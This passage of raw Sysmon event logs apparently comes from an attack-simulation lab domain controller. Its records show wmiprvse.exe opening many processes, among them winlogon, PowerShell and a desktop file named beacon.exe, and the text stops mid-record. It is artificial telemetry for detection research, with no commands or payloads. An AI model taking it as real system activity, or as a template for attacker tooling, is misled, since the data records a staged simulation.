1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237551Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.887{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B70F-00000000AD01}5892C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237550Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-76AE-6039-B60F-00000000AD01}5836C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237549Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74FB-6039-800F-00000000AD01}6628C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237548Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-780F-00000000AD01}6760C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237547Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-74C8-6039-770F-00000000AD01}7048C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237546Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-72C7-6039-2E0F-00000000AD01}4048C:\Users\Administrator\Desktop\beacon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237545Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6CBF-6039-3A0E-00000000AD01}4736C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237544Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-32CA-6039-2C07-00000000AD01}1356C:\Windows\system32\mshta.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237543Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CD05-00000000AD01}656C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237542Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F2-6039-CA05-00000000AD01}4956C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237541Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C405-00000000AD01}5096C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237540Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-29F0-6039-C105-00000000AD01}1648C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237539Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-232D-6039-D900-00000000AD01}3148C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237538Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5500-00000000AD01}3736C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237537Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.874{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22B4-6039-5100-00000000AD01}3532C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237536Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.873{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3200-00000000AD01}3220C:\Windows\System32\vds.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 17141700x80000000000000002237535Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-CreatePipe2021-03-02 16:52:52.873{05ADC7E1-6D64-603E-80AA-00000000AD01}5464\PSHost.132591775727257554.5464.DefaultAppDomain.powershellC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 10341000x80000000000000002237534Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.873{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-3000-00000000AD01}3052C:\Windows\system32\wbem\unsecapp.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237533Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.872{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2F00-00000000AD01}2724C:\Windows\system32\dfssvc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237532Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.872{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2E00-00000000AD01}2684C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002237531Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.856{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\system32\dns.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+2